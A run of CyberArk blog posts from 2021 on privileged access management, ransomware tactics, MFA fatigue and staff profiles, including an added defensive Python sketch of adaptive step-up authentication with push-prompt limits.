Attackers are constantly innovating. We saw many examples of this throughout the conference — from SolarWinds CEO Sudhakar Ramakrishna’s presentation to our own CyberArk Labs teams’ demonstrations of Kubernetes cluster attacks, biohacks, and SSO compromise. By “assuming breach,” the question becomes, are you protected even if you’ve already been attacked? That’s where an attacker’s mindset can give CISOs the edge they need to stay one step ahead. By assuming that any identity in the network has already been compromised, security teams can anticipate an attacker’s next move, minimize impact and stop threats before they reach valuable assets and cause harm.

4. Retrospectives Build Resilience

The SolarWinds digital supply chain attack prompted many CISOs to re-analyze current risk tolerance levels, cybersecurity and risk management efforts, areas of ongoing vulnerability, supply chain partner practices and more. It’s also the time, presenters urged, to update your incident response strategy, using frameworks like NIST as a guide. If your organization is attacked, use retrospectives to learn, further optimize your incident response strategy and build resilience. For example, “How were we compromised or breached?” becomes “How can we stop it next time?” (i.e., block lateral movement), and “Why didn’t we realize this was happening?” becomes “How can we improve MITRE ATT&CK coverage?”

5. A Job Requirement: Fluency in the “Language of Business”

Recent headline-grabbing attacks have made cybersecurity a regular boardroom discussion and business imperative. It’s the CISO’s job to make sure it stays front and center, even when news cycles quiet down.

It’s critical to have the capability to quantify risk (and resulting mitigation actions) in terms of dollars and cents, demonstrate how the cybersecurity program will drive business — and directly link key initiatives to business objectives. Industry frameworks like Factor Analysis of Information Risk (FAIR) can help CISOs “demystify” cybersecurity and bridge communication gaps with Boards and executive management.

6. Communication Matters. A Lot.

But it doesn’t end with Board discussions. Today’s CISO must be able to effectively articulate cybersecurity’s value proposition to customers, partners and internal stakeholders too. With digital supply chain attacks under the microscope, the need to build trust through transparency has never been greater. This takes a special mix of both hard and soft communications skills — the power of empathetic communication cannot be overstated.

The good news is CISOs don’t have to shoulder the burden themselves. By actively collaborating with IT security teams, CISOs can strengthen their message to various audiences and break down siloes. And increasingly, organizations are bringing on Business Information Security Officers (BISOs) to help translate the security agenda and make sure security objectives are treated as business requirements.

7. The New Heroes of Digital Transformation

CISOs and security leaders must become strategic advisors from the onset of digital transformation initiatives. Doing so enables innovation to move faster with greater protections in place. For that to happen, however, they must proactively embrace an advisory position, giving guidance and strategy to key stakeholders from the start. To that end, CISOs should seek partners (both within the organization and through outside public and private partnerships) that will boost their advisory capacity, facilitate information sharing and accelerate the shift to the next stage of cyber resiliency.

One of our favorite moments from this year’s RSA Conference was the closing keynote, featuring special guest Steve Wozniak. In this time of turbulence, he encouraged CISOs and security leaders to focus on the bright side of resilience — one of innovation and reinvention. In this spirit, until we meet again in San Francisco in person, let’s learn, evolve and build resilience to, as the RSA team put it, “protect the people and organizations that rely on us as their advocates. We will do more than survive. We will thrive.”

Hack(er)-of-All-Trades: Q&A with CyberArk Technical Evangelist Andy Thompson https://www.cyberark.com/blog/hacker-of-all-trades-qa-with-cyberark-technical-evangelist-andy-thompson/ Tue, 25 May 2021 13:00:35 +0000 https://www.cyberark.com/?p=118296 Andy Thompson

We can’t help it. We hear the word “hacker” and our minds instantly go to shadowy figures in dark rooms frantically causing as much malicious digital mayhem as they can. It’s a misconception that bothers Andy Thompson on so many levels. It’s also one of the many reasons he’s a perfect fit as a CyberArk Technical Evangelist.

“Hacking is not a crime,” he says, “And that’s something that I really advocate for. Hacking is near and dear to my heart. I consider myself a hacker — somebody who uses a tool outside of its intended purpose to find a solution.”

This is the original root definition of the term after all — and part of Thompson’s new mission to bring that concept to the fore. Some of the earliest known uses of “hack” have no negative connotations — in fact, the word was used in tech circles synonymously with “to work on.” It was the word used by tinkerers and the technologically curious, people who loved to take things apart to see how they tick … and engineer them to tick better.

“Yeah, that was me,” says Thompson. “I built my own machine at 12. I was definitely the person who would dissect any sort of piece of electronic that I could get my hands on.”

A self-described “jack-of-all-trades,” the Dallas-born Thompson came to CyberArk after a long and eclectic tech career. He gained not only valuable experience but also the realization that what he really enjoyed was talking about cybersecurity at a high level — coaxing people to understand, well, how it all ticks.

Thompson joined the CyberArk Customer Success Team in 2016. His skills and unique experience helped him lead a specialized group that he describes as a “SWAT team made up of CyberArk Solutions Engineering and Customer Success members.” Now a Technical Evangelist for CyberArk Labs, his journey here hasn’t been a straight line, but it’s made him right at home as an advocate for pure hacking culture and an identity-centric approach to cybersecurity.

We recently met up with Andy — virtually — to hear about his new role and how he got there. The following are excerpts from our conversation, which have been ever-so-slightly edited and condensed for clarity:

Your path to CyberArk took you through a lot of industries and organizations. What made you decide that this was going to be your calling?

Technology was just something that I’ve done ever since I was a child. I remember dialing in at midnight on my 286 to get into bulletin board systems.

I graduated with a bachelor’s in information systems from the University of Texas at Arlington. I was going to go to law school — in fact, I prepped for the LSAT — but then I just had a moral problem with being a criminal defender, which was my original plan. I decided to go back to what I knew: information systems. CyberArk was my first foray into sales, honestly. I was a systems administrator and a website developer. I’ve worked technology in industries from healthcare to movie theaters, bars, restaurants, global retail and IT, doing everything from Windows systems administration to managing Linux/Unix systems.

Is it true that your own experience getting hacked opened the door to your joining CyberArk?

One of my former employers was targeted in an attack, which I took as a personal affront.

We ended up tracking down the perpetrator, using what I call open source intelligence gathering, and sending law enforcement to his door. One of the agents working the case said to me, “Hey, you got a knack for security. Have you ever thought about doing InfoSec?” The rest, as they say, is history.

Another thing I experienced while working in-house was the frustration of deploying and using a Privileged Access Management platform that just wasn’t very good. I thought, “I got to go find something that works better than this.” Coincidentally, it was my best friend since we were 11 years old, Allan Cox, a Principal Solutions Engineer at CyberArk, who encouraged me to come work here. And I’m glad he did, as I truly believe that what we’re doing at CyberArk is a calling. We’re protecting people and data, and at the end of the day, I can go to bed knowing that we’re making the world a little bit better. I know that sounds corny, but it’s true.

What is your day-to-day like now?

My primary role is championing the amazing tools and research coming from CyberArk Labs. Our Labs team — now these are the real hackers. These are the ones who are finding new vulnerabilities and exploits, demonstrating offensive tactics, and helping organizations adopt an attacker’s mindset.

Our Attack & Defend Virtual War Room Experience is a great example of how we’re getting the team’s cutting-edge research out to the masses. One of our latest events featured a live simulation with Len Noe demonstrating five of the most notorious breaches in recent history, all based on CyberArk Labs’ attack deconstructions and threat research. I’m loving it.

With all of the industries and organizations you’ve worked for, have there been any consistencies that you can still draw on in your current role?

One thing I see across the board is the human element of risk. Sure, there are vulnerabilities from time to time, but nine times out of 10, you’re going to see attackers take advantage of software or systems that have been unintentionally misconfigured. In fact, the new Verizon DBIR 2021 identified misconfigurations as the most common form of error-driven breach by far.

To give an example, there was a major attack reported a few years back on a large enterprise that all started with a misconfigured firewall. The attacker used it to enter the company’s cloud provider network and gain privileged access to a virtual machine (VM). Then, by compromising access keys and assuming an over-permissioned role, the attacker obtained temporary privileged credentials to the company’s cloud database, which contained troves of sensitive customer data. As a result of the breach, the organization was forced to pay millions of dollars in regulatory fines.

Misconfigurations are rampant and only getting worse — especially in cloud environments. And it sometimes feels like you’re yelling into the abyss because you’re telling people to do something and they’re not listening because maybe it’s more operationally efficient to cut a couple corners here or there — it’s frustrating for sure. But I also get it: I made plenty of snafus in my old sysadmin days and know how easy it is for misconfigurations to happen — and add up fast. It’s my hope that I can help today’s sysadmins and cloud architects steer clear of similar mistakes and find ways to tackle these challenges in simpler, more automated ways.

Breaking Down the Business Benefits and Cost Savings of CyberArk Privileged Access Management as a Service https://www.cyberark.com/blog/breaking-down-the-business-benefits-and-cost-savings-of-cyberark-privileged-access-management-as-a-service/ Tue, 18 May 2021 13:00:48 +0000 https://www.cyberark.com/?p=118101 Forrester TEI Report PAM SaaS

By now, most organizations understand the importance of Privileged Access Management (PAM) in reducing risk and protecting critical assets from inevitable cyber attacks. But what may be less obvious are the operational efficiencies and positive financial impact the right solution can have on your business.

CyberArk recently commissioned Forrester Consulting to conduct a Total Economic Impact™ (TEI) study to examine the business benefits and cost savings enabled by two of our Privileged Access SaaS solutions, CyberArk Privilege Cloud and CyberArk Endpoint Privilege Manager, which are often used together to secure privileged access from the endpoint to hybrid workloads.

“The Total Economic Impact™ Of CyberArk Privileged Access Management As A Service” quantifies benefits realized by a composite organization (which we’ll refer to here as the “Organization”), based on data aggregation and in-depth interviews with five CyberArk enterprise customers in the financial, insurance, healthcare and legal sectors. Our hope is that security leaders can tap into these peer insights to help make informed Privileged Access Management prioritization and investment decisions.

Below, we break down four of the study’s top findings and explain why they matter:

1. Fill Cybersecurity Skills Gaps and Simplify Operations

According to a 2021 PwC report, more than half (51%) of organizations are planning to add full-time cybersecurity personnel over the next year, with cloud solutions topping the list of roles they want to fill at 43%. Yet finding the right people is no small task: the global number of unfilled cybersecurity jobs is expected to reach 3.5 million this year. Simply put, most organizations don’t have a surplus of trained security professionals on staff to deal with infrastructure headaches and time-consuming administrative processes, such as discovering and onboarding privileged accounts and manually changing credentials and secrets.

Forrester found that by using CyberArk PAM as a service, the Organization realized an estimated time savings of 780 hours annually, which translates to operational efficiency savings worth $104,914 over three years. With this new-found bandwidth, internal IT staff can focus valuable time and efforts on strategic tasks that support core business activities. And, with hundreds of out-of-the-box integrations available from the CyberArk Marketplace, CyberArk integrates seamlessly into existing IT security stacks and provides immediate time to value.

“CyberArk Privilege Cloud allows our organization to secure our infrastructure and applications and to run our privileged access management activities much more efficiently while maintaining the confidentiality of sensitive data,” said a director of information security at a large insurance organization.

2. Improve Regulatory Compliance and Ease Audits

Organizations are contending with an alphabet soup of industry regulations and security frameworks like SOX, HIPAA, PCI-DSS, MAS TRM, NERC CIP, SOC 2 Type 2 and CMMC, among many others. With so many different users, disparate IT systems and hybrid and multi-cloud environments, many organizations struggle to meet requirements and prove to auditors that privileged access and least privilege enforcement are under control.

By centralizing and automating the enforcement of privileged access policies with CyberArk, the Organization realized $152,435 on compliance, regulatory and audit labor savings over three years.

Interviewees also indicated that simplified audit reporting has helped improve their relationships with auditors and regulators. A president of global identity access management at a financial services firm explained why this is critical: “There’s nothing that annoys a regulator more than coming in and finding deficiencies that you as an organization didn’t already identify. Because, to them, their perception is that they found something that you didn’t know you had. So, CyberArk really does give you more credibility with the outside auditors and regulators by its ability to prove full compliance of regulations.”

3. Protect Endpoints Anywhere and Block Ransomware Attacks

Endpoint attacks such as spear-phishing and ransomware can disrupt business, damage organizational reputation and result in crippling lawsuits and fines. Ninety-seven percent of senior security executives say attackers are increasingly trying to steal one or more types of credentials in such attacks on PCs, Macs, servers and remote devices. And they’re zeroing in on business users with access to sensitive data who may not be adequately protected or trained to spot a spoof. It only takes one unsuspecting user to click on a malicious link, open the door for an attacker and set off an attack chain leading to stolen data or encrypted information held for ransom.

Local administrator rights are often left on endpoints, making them attractive targets for attackers who can use these credentials to elevate privileges and launch into other parts of the network. Removing local admin rights from workstations significantly reduces risk but can inhibit productivity while workers wait for necessary access to systems and software, and overburden IT help desk teams with install requests and configuration changes. There’s a need for more flexibility and automation when it comes to both requesting and provisioning privileged access to company resources. And as ransomware attacks surge — and 59% of security decision makers view ransomware as a top security risk — organizations are looking for a way to shore up vulnerabilities, improve security posture and mitigate risk.

The Organization found a balanced approach to securing endpoints and maintaining productivity with CyberArk Endpoint Privilege Manager. Forrester calculated resulting service desk benefits worth $70,502 over three years. Each year, the Organization was able to save 780 IT help desk service requests at a cost of $40 per ticket, helping end users and IT teams boost productivity.

CyberArk Endpoint Privilege Manager has been tested on more than three million ransomware samples to date, and its unique approach to local administrator rights removal and application control has been proven 100% effective in preventing this ransomware from encrypting files.

4. Reduce Risk of Serious Security Breach

Today, the leading cause of breach is identity compromise and the subsequent abuse of privileged credentials. Every corporate identity — whether human or machine — can have privileged access under certain conditions, creating an attack path to an organization’s most valuable assets.

CyberArk Privileged Access solutions secure privileged access wherever it exists. Our privileged access-led approach to Identity Security is designed to help enterprises adapt and embrace a risk-based strategy for defending against advanced attacks. By focusing on identifying and isolating threats that have made their way through the dissolving security perimeter, organizations can defend the heart of the enterprise, protecting what matters most.

This approach enabled the Organization to reduce risk of a serious security breach — a cost avoidance savings valued by Forrester at $586,711 over three years. When making this calculation, Forrester took two major categories into account: the cost avoidance savings of a breach (fines, lawsuits, reputational damage, etc.) and the cost avoidance savings of internal productivity loss associated with a breach.

The Bottom Line

According to Forrester, by using both CyberArk SaaS solutions, the Organization achieved a total three-year, risk-adjusted benefit of $914,562, and realized full ROI in less than nine months.

Of course, there are some business benefits that just can’t be quantified, like the peace of mind that comes with knowing your most critical assets are secure — and having the confidence to accelerate business agility, knowing you’re fully covered today and in the future.

A financial services vice president of global identity access management summed those intangibles up in the study: “At our company, CyberArk’s solutions provide an additional level of value through risk reduction that’s afforded to our shareholders and our customers by virtue of the security that we’re implementing and the protection that they’ve come to expect.”

But there’s more to the story. Check out the infographic or download the study for a full analysis, as well as customer testimonials, deployment considerations, integration insights and other key findings.

This blog post highlights key findings of a case study commissioned by CyberArk titled: The Total Economic Impact™ Of CyberArk Privileged Access Management As A Service, March 2021.

© 2021 Forrester Research, Inc. All rights reserved. Forrester is a registered trademark of Forrester Research, Inc.

Opportunistic vs. Targeted Ransomware Attacks https://www.cyberark.com/blog/opportunistic-vs-targeted-ransomware-attacks/ Wed, 12 May 2021 13:00:12 +0000 https://www.cyberark.com/?p=117734 Targeted Opportunistic Ransomware Attacks

The critical infrastructure systems we rely on to deliver water, electricity, fuel and other essential services are under siege. Increasingly, ransomware is becoming cyber criminals’ attack method of choice, for they understand that even short periods of downtime can cause far-reaching disruption and damage. This puts extreme pressure on victim organizations to pay up in order to decrypt data and restore operations quickly.

While industrial systems may be top-of-mind today, the threat of ransomware knows no boundaries, and no individual or industry is safe from its reach — especially in the age of cloud, mobile and highly distributed workforces.

U.S. Acting Deputy Attorney General John Carlin recently told the Wall Street Journal, “By any measure, 2020 was the worst year ever when it comes to ransomware and related extortion events.” During the height of the COVID-19 pandemic, for example, ransomware operators targeted hospitals and healthcare organizations with unrelenting attacks. Ransomware accounted for 54.95% of healthcare data breaches and cost the industry $20.8 billion in downtime last year alone.

But why is ransomware so pervasive, and how do these attacks continue to be so successful? To answer these questions, it’s important to understand how opportunistic and targeted ransomware attacks work.

What is an Opportunistic Ransomware Attack?

A whopping 86% of breaches are financially motivated, according to the 2020 Verizon Data Breach Investigations Report. Attackers know that ransomware is one of the quickest and easiest ways to turn a profit. And since do-it-yourself ransomware kits are plentiful on the dark web, the barrier to entry is low.

By distributing ransomware in bulk using common “spray and pray” tactics — such as phishing, social engineering and exploit kits — attackers can target many organizations and infect numerous desktops, laptops and servers in one fell swoop. Once deployed, the ransomware prevents users from interacting with their files, applications or systems until a ransom is paid, usually in the form of an untraceable currency like Bitcoin.

The 2017 WannaCry outbreak is perhaps the best example of an opportunistic ransomware attack. With the ability to self-replicate, this ransomware strain went viral, infecting more than 200,000 systems across 150 countries. The attack impacted organizations across many sectors, bringing business operations to a grinding halt. Britain’s National Health Service (NHS) was forced to close critical healthcare facilities, cancel surgeries and turn away patients for several days. Many organizations faced similar challenges.

Ransomware has become a preferred means of extortion by opportunistic attackers for two key reasons. First, many organizations fail to practice proper security hygiene when it comes to backup and recovery. Backups may be few and far between, meaning that once data on endpoints and servers is encrypted and held for ransom, organizations are forced to choose between losing important data forever or forking over Bitcoin to (hopefully) get their data back. Second, many organizations rely too heavily on traditional anti-virus solutions, which are often not effective in blocking ransomware. These solutions work by maintaining an inventory of known malware and blocking future executions of that malware. Because ransomware files slightly morph with each new version — and new versions are created by the minute — these solutions have little chance of preventing an infection.

What is a Targeted Ransomware Attack?

In recent years, more sophisticated attackers have shifted to targeted ransomware approaches in search of bigger payouts. In what is sometimes referred to as “big game hunting,” these attackers target very specific organizations based on their ability (or need) to pay large ransoms, using customized tactics, techniques and procedures (TTPs).

These attackers are very creative, often going to great lengths to understand a victim’s technology stack so they can identify and exploit vulnerabilities, while pinpointing the most valuable data to encrypt and hold for ransom. They’re also extremely patient, escalating privileges to circumvent security systems and evading detection for months — or longer — before deploying the ransomware payload. During this time, attackers often target data backups (if they exist) so the organization cannot restore files after they’ve been encrypted. And these attackers expect to be compensated for putting in the extra work. According to the 2021 Unit 42 Ransomware Threat Report, the highest ransomware demand from 2015 to 2019 was $15 million. In 2020, the highest demand doubled to $30 million.

A recent example of this long-tail, targeted approach is the Hades ransomware attacks. ZDNet reports that ransomware operators are targeting large multi-national organizations with annual revenues of over $1 billion and have successfully attacked at least three companies in the transportation, retail and manufacturing industries.

Based on Accenture researchers’ analysis of these Hades ransomware attacks, the threat actors followed a familiar attack path: steal valid credentials from a corporate identity and use these credentials to infiltrate the company via Remote Desktop Protocol (RDP) or Virtual Private Network (VPN). Once inside, the attackers escalated privileges and moved laterally to establish persistence on the network. From there, they exfiltrated data and then deployed the Hades ransomware to encrypt files and demand hefty ransoms in a one-two, double extortion punch.

The researchers noted, “We observed significant effort by the threat group to disable or bypass endpoint defenses, including Endpoint Detection and Response (EDR) tooling, using both custom tooling and hands on keys approaches.”

Perhaps the most troubling thing about targeted ransomware attacks is that just because an organization has been targeted once, it doesn’t mean it won’t happen again. To maintain persistence on target networks, attackers often construct backdoors that allow them to reenter at will. Most companies cannot withstand the business impact of one ransomware attack, let alone two.

Opportunistic or Targeted, the Initial Attack Vector Remains the Same

Whether opportunistic or targeted, ransomware attacks start on the endpoint. Inadequately protected desktops, laptops and servers are pervasive — and each one provides a potential entry point for attackers to steal and encrypt data.

By examining numerous ransomware attacks, one thing is abundantly clear: relying on a single endpoint security solution — endpoint detection and response, anti-virus or otherwise — is not enough to stop every threat. In fact, organizations are wise to adopt an assume-breach mindset to reduce the chances of ransomware encrypting files, even if it does enter their environments. And ultimately, a defense-in-depth approach is necessary, layering a variety of security controls to eliminate gaps, reduce exposure and strengthen overall security posture. When it comes to endpoint security, one plus one really does equal three.

Privileged Access Management is a critical, yet often overlooked, component of an effective endpoint security strategy. If a malicious attacker or insider gains access to a privileged credential, he or she will appear to be a trusted user. This makes it very difficult to detect risky activity.

In combination with endpoint detection and response, anti-virus/NGAV, application patching and OS patching, organizations can significantly reduce risk by managing and securing privileges on endpoint devices. And by implementing restriction models that only trust specified applications run by specific accounts under specific circumstances, organizations can detect ransomware quickly and with certainty. By taking this comprehensive approach to endpoint security, organizations can defend from every angle and block attacks before they cause harm — whether they’re “sprayed” in their general direction or headed straight toward them.

To dive deeper into ransomware attack trends and mitigation strategies, register for our June 1 webinar, “Ransomware Exposed: Key Learnings from Examining 3 Million Samples.”

Video: What Nightclub Security Reveals About Privileged Access Management https://www.cyberark.com/blog/video-what-nightclub-security-reveals-about-privileged-access-management/ Thu, 06 May 2021 11:00:33 +0000 https://www.cyberark.com/?p=117527 PAM Lessons from Nightclub Security

Let’s face it – we’re collectively ready for a night on the town. And while nightclubs may not be everyone’s bag, we predict they’re going to be bustling soon, with both regulars eager to again rejoice with a festive crowd and newcomers keen to never let another fun opportunity pass them by. Because, yes, as of this moment there’s seemingly light at the end of the pandemic tunnel, and thumping bass will beckon us to celebrate – and maybe even dance without a care for social distancing. Maybe? And when nightclubs are back in full force it’ll be a pretty strong sign that normalcy again reigns.

Those of us working in IT and security, who’ve been making remote work possible – and safe – will no doubt be among the first to get in line behind the velvet rope. And because of what we do, we couldn’t help but think about how getting into a club, and nightclub security in general, have many parallels with Identity Security – a discipline that’s become ever more important during the last year’s accelerated shift to digital. Centered on privileged access management (PAM), Identity Security has been integral to handling the exponential growth in identities and credentials with elevated access, all of which need to be managed, monitored, and controlled to remain safe.

Yes, we geek out on this stuff – always.

Check out our short video to see how nightclub security is just like protecting privileged access across your organization. Because privilege can be found everywhere – across all identities, devices, and apps from the endpoint to the cloud. And then, get ready to get your boom boom boom on. Safely, of course. We’ll maybe even give you permission to enter the VIP lounge.

Put Your Best Foot Forward: Secure MFA Starts with the First Step https://www.cyberark.com/blog/put-your-best-foot-forward-secure-mfa-starts-with-the-first-step/ Tue, 04 May 2021 12:00:09 +0000 https://www.cyberark.com/?p=117537 MFA Foundational to Zero Trust

When attempting to implement a Zero Trust security model, the first step is the most important… but maybe not for the reasons you think. We don’t mean this in a symbolic sense – it’s not the “first step” toward a grand vision or mission statement about an organization’s commitment to robust security. No, we mean it in a very real, practical sense. That first step is important because it’s where the most potentially damaging mistakes are often made.

Multi-Factor Authentication (MFA) is one of those Zero Trust building blocks that’s susceptible to weak points — some due to deployment missteps, but most because it’s incredibly difficult to balance stringent security with practical usability. Unfortunately, it’s often unclear until after a system is in place if you’ve veered too much toward one or the other.

Since combined MFA and Single Sign-On (SSO) systems are often an organization’s gateway to Zero Trust, it’s important not to stumble on your way through it. This requires an understanding of the challenges inherent in MFA implementation — many of which aren’t always immediately apparent — and a clear sense of the long-term strategy for effectively anticipating and thwarting attacks.

If “the journey of a thousand miles starts with a single step,” it’s important that first one lands on solid ground. Here’s how you can help ensure it does.

Your Organization is Only Human

There are two truths when it comes to cybersecurity. One, attackers are constantly inventing new ways to circumvent blockades. And two – simple human error is one of the quickest and easiest ways to get inside a network, regardless of existing technological roadblocks.

“MFA fatigue” is real, and it can undermine security efforts in potentially damaging ways. There are a number of ways in which a Zero Trust implementation can reveal resulting vulnerabilities. The most notable is that most users, when faced with repeated authentication messages and touchpoints, can become lazy or careless and unwittingly create openings for attackers.

For example, when faced with repeated prompts for re-authentication, most users will simply click “yes” to rid themselves of the pop-up, without reading the request or taking the time to consider its legitimacy. It’s simple human nature — if your phone is “dinging” repeatedly, you’ll do whatever you can to make it stop. That could mean clicking on a malicious prompt or even logging in to a screen designed to look like one of your usual systems. Either way, the attacker is banking on MFA fatigue to make the user careless.

Other avenues for attack include hijacking an SSO session by compromising the very machine the user is employing, through malware or other such means. Secondary channels are also often left unprotected, such as the protocols that Active Directory environments enable by default. For example, with Server Message Block (SMB) and Remote Procedure Call (RPC), an attacker would need only a username and password, with no secondary verification.

These are classic privileged access challenges — and why security teams should “own” UX. This can help ensure MFA and SSO system security is bolstered with Privileged Access Management (PAM) controls that add further layers of security to all available access points. Recent attacks have shown that if your authentication systems are protected by passwords and nothing else, it’s no longer a question of if you will be compromised but when.

Striking the Right Balance

The CISO View 2021 Survey: Zero Trust and Privileged Access found that a majority of the respondents, an overwhelming 86%, agreed that optimizing the user experience was “very important” or “important” when implementing Zero Trust. The willingness is there; however, putting it into practice reveals just how tricky that balance between usability and security can be.

The CISO View survey pointed toward two keys to minimize friction (and thereby improve UX) — utilizing passwordless authentication and artificial intelligence (AI). The first speaks to having multiple layers of authentication, usually a mix of a physical factor such as a USB key or QR code and biometrics (such as facial recognition or fingerprint scanning), which are naturally stronger lines of defense.

But it’s the second — AI — that offers the critical context and insights needed to effectively balance user experience with security. When it comes to MFA, it’s not just about the number of different data signals an AI system can ingest, but also the ways it can interact with that data to help organizations automatically learn the “normal” behavior of each individual identity. And when they detect a deviation from that baseline, or any other risky event, organizations can easily block an employee’s access until they go through a stronger round of authentication.

To put it another way, the push for AI and machine learning isn’t a race to create the smartest algorithm — it’s the race to create the most informed.

AI can and will also play an important role in automating the evaluation of risk. Re-authentication requests would, therefore, be required only for risky access requests based on context and behavior — those that deal with highly sensitive data. This would cut down on the dull repetition of re-authentication requests for “everyday” interactions, which will reduce fatigue and improve UX.
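As an added example (not CyberArk’s code), here is a small adaptive-authentication engine of the kind the preceding paragraphs describe: it learns a per-identity baseline, requires a second factor only when a request deviates from that baseline or touches sensitive data, and caps push prompts per time window so repeated prompts cannot wear a user down. All users, devices, weights and thresholds are constructed sample values.

```python
"""Adaptive step-up authentication with push-prompt throttling.

Added example, not CyberArk code. Learn each identity's baseline (devices,
countries, working hours), step up only on deviation or sensitive access,
and cap push prompts per window to blunt MFA fatigue. Every user, device,
weight and threshold below is a constructed sample value.
"""
from dataclasses import dataclass, field


@dataclass
class AccessRequest:
    user: str
    device_id: str
    country: str
    hour: int          # local hour of day, 0-23
    resource: str
    sensitive: bool    # set by the resource's data classification


@dataclass
class Baseline:
    devices: set = field(default_factory=set)
    countries: set = field(default_factory=set)
    hours: set = field(default_factory=set)


class AdaptiveAuth:
    STEP_UP_AT = 2        # score at or above this: require a second factor
    BLOCK_AT = 5          # score at or above this: refuse outright
    MAX_PUSHES = 3        # push prompts allowed per user per window
    WINDOW_SECONDS = 600  # sliding window for the push cap

    def __init__(self):
        self.baselines = {}   # user -> Baseline learned from past sessions
        self.push_log = {}    # user -> timestamps (seconds) of recent prompts

    def learn(self, req):
        """Record a successfully authenticated session as baseline behaviour."""
        b = self.baselines.setdefault(req.user, Baseline())
        b.devices.add(req.device_id)
        b.countries.add(req.country)
        b.hours.add(req.hour)

    def score(self, req):
        """Weighted deviation from the baseline plus resource sensitivity."""
        b = self.baselines.get(req.user)
        if b is None:
            return 3, ["no baseline for identity"]
        s, reasons = 0, []
        if req.device_id not in b.devices:
            s, reasons = s + 2, reasons + ["unknown device"]
        if req.country not in b.countries:
            s, reasons = s + 2, reasons + ["new country"]
        if req.hour not in b.hours:
            s, reasons = s + 1, reasons + ["outside usual hours"]
        if req.sensitive:
            s, reasons = s + 2, reasons + ["sensitive resource"]
        return s, reasons

    def _push_allowed(self, user, now):
        recent = [t for t in self.push_log.get(user, []) if now - t < self.WINDOW_SECONDS]
        if len(recent) >= self.MAX_PUSHES:
            self.push_log[user] = recent
            return False
        self.push_log[user] = recent + [now]
        return True

    def decide(self, req, now):
        """Return (decision, reasons): allow, step_up, block or deny_fatigue."""
        s, reasons = self.score(req)
        if s >= self.BLOCK_AT:
            return "block", reasons
        if s >= self.STEP_UP_AT:
            if not self._push_allowed(req.user, now):
                # Fail closed instead of sending yet another prompt: an extra
                # prompt is exactly what a fatigue attack wants the user to tap.
                return "deny_fatigue", reasons + ["push cap reached"]
            return "step_up", reasons
        return "allow", reasons


def demo():
    """Constructed scenario; returns the decision for each request."""
    auth = AdaptiveAuth()
    # alice normally works 09:00-17:00 from one laptop in the US
    for hour in range(9, 18):
        auth.learn(AccessRequest("alice", "laptop-1", "US", hour, "wiki", False))
    results = {}
    results["routine"] = auth.decide(
        AccessRequest("alice", "laptop-1", "US", 10, "wiki", False), 1000)[0]
    results["sensitive"] = auth.decide(
        AccessRequest("alice", "laptop-1", "US", 10, "payroll", True), 1001)[0]
    results["foreign_new_device_night"] = auth.decide(
        AccessRequest("alice", "phone-9", "RO", 3, "wiki", False), 1002)[0]
    new_device = AccessRequest("alice", "phone-9", "US", 10, "wiki", False)
    # three quick retries from the unknown device: prompts 2 and 3 go out,
    # the third attempt hits the cap and is denied rather than prompted
    results["new_device_burst"] = [auth.decide(new_device, 1003 + i)[0] for i in range(3)]
    results["after_window"] = auth.decide(new_device, 1003 + 700)[0]
    return results
```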

Practical Advice

Zero Trust is a big idea. It encompasses big-picture thinking while depending mightily on the small details, right toolset and human elements that keep it working. When an organization is looking to move toward a Zero Trust model, that first step can seem elusive and fraught with peril.

But as we’ve seen, strong Identity Security offers a solid, practical way to achieve Zero Trust. It delivers the right mix of solutions to secure individual identities throughout the cycle of accessing critical assets — starting with adaptive authentication mechanisms protected in an almost symbiotic way with strong privileged access controls. This helps ensure the user experience is designed not only for optimal security but also for smooth, easy, and efficient UX that won’t lull users into making critical mistakes.

Even as security measures become more advanced, attackers know that human error is a reliable weakness to exploit. Don’t wait until you’ve been breached to fix those holes; take the steps to build a solid MFA foundation that’s dependable and practical — from the very beginning.

Can You Stop a Cyborg Attack? Get Inside a Biohacker’s Mind at RSA 2021 https://www.cyberark.com/blog/can-you-stop-a-cyberborg-attack-get-inside-a-biohackers-mind-at-rsa-2021/ Fri, 30 Apr 2021 12:00:38 +0000 https://www.cyberark.com/?p=117422 Len Noe Biohacking RSA

With a consuming curiosity, obsession with lock picking – both physical and abstract – and sharp technical mind, Len Noe has been breaking and building things nearly all of his life. Hacking, as he discovered at a young age, was not only a form of self-expression and creativity but also a powerful tool that could be used in many different ways – even to extend one’s own physical capabilities and cognitive capacity.

Today, as a white hat hacker and global sales engineer at CyberArk, Noe uses his unique skills to help organizations get inside the minds of attackers, so they can protect themselves and strengthen their cyber resilience.

We sat down with Noe to hear his story and find out what he’s been up to while grounded at home during the pandemic. Plus, we had to see for ourselves how this self-proclaimed “cyborg” is transforming his own body – chip by chip – in the name of research and cybersecurity advancement. But more on that later.

Frogger and Solving the Unsolvable Puzzle

Noe’s interest in technology can be traced back to his father, a gadget lover and early tech adopter who introduced him to the Commodore 64 in the early 1980s.

Noe remembers the precise moment his own technology fascination turned into a full-blown obsession. He was reading a coding newsletter that outlined steps for building a simple computer game – Frogger, to be exact.

“I made a coding error while following the instructions,” he recalls, “but the mistake actually made it so that my frog wouldn’t die. That was when it clicked for me, and I started to think more critically about why this happened and how I could manipulate the outcome.”

With the frog (somewhat) proverbially out of the well, Noe started to realize the capabilities of technology went far beyond the pages of instruction manuals and computer magazines. And he’s been pushing the boundaries ever since.

He’s spent decades honing his skills – mostly by practical application. And his career as a grey-turned-white hat hacker has had numerous twists and turns along the way. But one thing has never changed: the thrill of cracking the code and solving the “unsolvable” puzzle.

It’s what Noe says he loves most about his job – finding new, creative ways to exploit technology systems and pinpoint even the tiniest of flaws so that organizations can strengthen protections and help prevent attacks. And he’s making a name for himself as a global technology evangelist in the process. He’s presented threat research in more than 20 countries and keynoted major security conferences around the world.

Attack and Defend

Pre-COVID, you’d often find Noe side-by-side with customers, sleeves rolled up – tattoos revealed – surrounded by computers. His high-energy presentations dig into the why and how of some of the world’s most sophisticated attacks. In fact, this hands-on approach has prompted some rather uncomfortable conversations with airport security staff about the bag of suspicious-looking tech tools that accompany him to each engagement.

One evening, after a presentation in Brazil, Noe came up with a new, interactive way for organizations to expand their skills as defenders. After returning home and fleshing out the idea alongside friend and colleague Andy Thompson, the CyberArk Attack & Defend series was born. In these capture-the-flag style workshops, attendees use real-world attack tools, techniques, and procedures (TTPs) to execute the high-profile attacks seen in today’s headlines. Then, they swap roles and interact with CyberArk solutions to learn how to detect and defend against the same attacks.

Noe explains that most security professionals spend a lot of time reading about attacks, but few have actually seen one being perpetrated in real-time.

